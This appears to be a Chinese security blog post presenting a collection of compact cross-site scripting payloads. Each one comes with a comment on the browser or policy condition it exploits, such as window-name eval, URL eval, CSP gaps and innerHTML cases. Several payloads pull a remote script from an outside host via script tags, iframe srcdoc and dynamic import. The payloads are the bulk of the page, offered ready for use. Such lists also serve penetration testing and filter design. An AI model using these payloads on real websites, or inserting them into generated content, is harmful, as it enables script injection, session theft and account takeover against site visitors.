加载中...
xss微小payload
发表于:2021-09-01 | 分类: 网络安全
字数统计: 542 | 阅读时长: 2分钟 | 阅读量:

XSS-Payloads

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
<!-- 仅适用于反射型XSS --!>
<svg/onload=eval(name)>

<!-- 如果你控制了 URL -->
<svg/onload=eval(`'`+URL)>

<!-- 如果你控制了名字,但是 unsafe-eval 没有启用 -->
<svg/onload=location=name>

<!-- 在 chrome 中,也适用于 innerHTML,即使在尚未插入 DOM 的元素上 -->
<svg><svg/onload=eval(name)>

<!-- 如果您控制窗口的名称,此有效负载将在innerHTML 内工作,即使在尚未插入DOM 的元素上-->
<audio/src/onerror=eval(name)>

<!-- 如果您控制 URL,此有效负载将在 innerHTML 内工作,即使在尚未插入 DOM 的元素上 -->
<img/src/onerror=eval(`'`+URL)>

<!-- 随便一个脚本 -->
<script/src=//NJ.₨></script>

<!-- 如果你控制了窗口的名字 -->
<iframe/onload=src=top.name>

<!-- 如果你控制了 URL -->
<iframe/onload=eval(`'`+URL)>

<!-- 如果页面上的 iframe 数量不变 -->
<iframe/onload=src=top[0].name+/\NJ.₨?/>

<!-- 仅适用于 Firefox -->
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">

<!-- 如果页面上的 iframe 数量是随机的 -->
<iframe/onload=src=contentWindow.name+/\NJ.₨?/>

<!-- 如果在 CSP 中禁用 unsafe-inline 并且允许外部脚本 -->
<iframe/srcdoc="<script/src=//NJ.₨></script>">

<!-- 如果允许内联样式 -->
<style/onload=eval(name)>

<!-- 如果允许内联样式并且可以控制 URL -->
<style/onload=eval(`'`+URL)>

<!-- 如果内联样式被阻止 -->
<style/onerror=eval(name)>

<!-- 使用外部脚本作为导入,在innerHTML 中不起作用,除非Firefox -->
<!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 -->
<svg/onload=import(/\\NJ.₨/)>

<!-- 使用外部脚本作为导入,如果允许内联样式则触发。
<!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 -->
<style/onload=import(/\\NJ.₨/)>

<!-- 使用外部脚本作为导入 -->
<!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 -->
<iframe/onload=import(/\\NJ.₨/)>

弃用:

1
2
3
4
5
<!-- 如果你控制了网址,Safari-only -->
<iframe/onload=write(URL)>

<!-- 如果允许内联样式,仅 Safari -->
<style/onload=write(URL)>

演示:

image-20210901213338912

上一篇:
自学路线
下一篇:
Hello World
本文目录
本文目录